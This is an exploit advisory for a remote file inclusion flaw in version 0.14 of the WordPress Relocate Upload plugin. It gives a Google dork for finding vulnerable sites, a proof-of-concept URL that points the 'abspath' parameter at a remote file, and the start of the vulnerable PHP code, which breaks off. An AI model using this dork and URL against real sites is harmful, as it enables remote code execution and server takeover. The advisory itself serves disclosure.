WordPress Relocate Upload Plugin 0.14 Remote File Inclusion
# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup …